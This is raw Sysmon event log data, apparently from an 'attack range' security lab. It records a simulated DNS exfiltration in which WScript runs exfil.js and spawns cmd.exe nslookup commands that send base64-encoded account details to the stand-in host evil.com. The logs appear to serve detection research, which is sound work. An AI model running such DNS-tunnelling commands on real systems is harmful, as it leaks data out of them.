14:21:57.143{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0747-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000217370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{00000000-0000-0000-0000-000000000000}4232<unknown process>-udptruefalse127.0.0.1-51437-false127.0.0.1-53domain 10341000x8000000000000000217369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.143{2E1864BB-1905-629A-0547-000000005F02}37367372C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-0747-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{00000000-0000-0000-0000-000000000000}4232<unknown process>-udpfalsefalse127.0.0.1-51436-false127.0.0.1-53domain 154100x8000000000000000217367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.158{2E1864BB-1905-629A-0747-000000005F02}5776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-0547-000000005F02}3736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwae.tmp 2>&1 354300x8000000000000000217366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.157{00000000-0000-0000-0000-000000000000}4232<unknown process>-udptruefalse127.0.0.1-51436-false127.0.0.1-53domain 354300x8000000000000000217365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.026{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-51435-false127.0.0.1-53domain 22542200x8000000000000000217364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{00000000-0000-0000-0000-000000000000}3596evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.032{00000000-0000-0000-0000-000000000000}7300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.940{00000000-0000-0000-0000-000000000000}1080evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.856{00000000-0000-0000-0000-000000000000}5824evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.767{00000000-0000-0000-0000-000000000000}8128evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.699{00000000-0000-0000-0000-000000000000}3536evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.620{00000000-0000-0000-0000-000000000000}1144evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.539{00000000-0000-0000-0000-000000000000}928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.468{00000000-0000-0000-0000-000000000000}3916evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.359{00000000-0000-0000-0000-000000000000}7384evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.235{00000000-0000-0000-0000-000000000000}5628evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{00000000-0000-0000-0000-000000000000}7532evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000217352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.112{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0647-000000005F02}7704C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.112{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0647-000000005F02}7704C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.112{2E1864BB-1905-629A-0647-000000005F02}77042628C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0547-000000005F02}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0647-000000005F02}7704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0547-000000005F02}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-18E0-629A-6742-000000005F02}39767984C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-0547-000000005F02}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.090{2E1864BB-1905-629A-0547-000000005F02}3736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwae.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.075{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkhf.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.043{2E1864BB-1904-629A-0347-000000005F02}76681352C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0447-000000005F02}4176C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.028{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.028{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.028{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0447-000000005F02}4176C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.028{2E1864BB-1904-629A-0247-000000005F02}68565956C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-0447-000000005F02}4176C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.042{2E1864BB-1905-629A-0447-000000005F02}4176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-0247-000000005F02}6856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkhf.tmp 2>&1 10341000x8000000000000000217332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.012{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-0347-000000005F02}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.012{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-0347-000000005F02}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.012{2E1864BB-1904-629A-0347-000000005F02}76681352C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-0247-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-0347-000000005F02}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000044929Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:57.909{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8692329D95E2FAA0E0C6B1122954E9F4,SHA256=3B21D12301B6347B9798DB5513F88758E42B8855B125EC2A48C2C03D06BBBCBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044928Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:54.634{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52389-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000217866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.255{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51521- 354300x8000000000000000217865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.255{00000000-0000-0000-0000-000000000000}1804<unknown process>-udptruefalse127.0.0.1-51521-false127.0.0.1-53domain 354300x8000000000000000217864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.156{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51520- 354300x8000000000000000217863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.156{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51520- 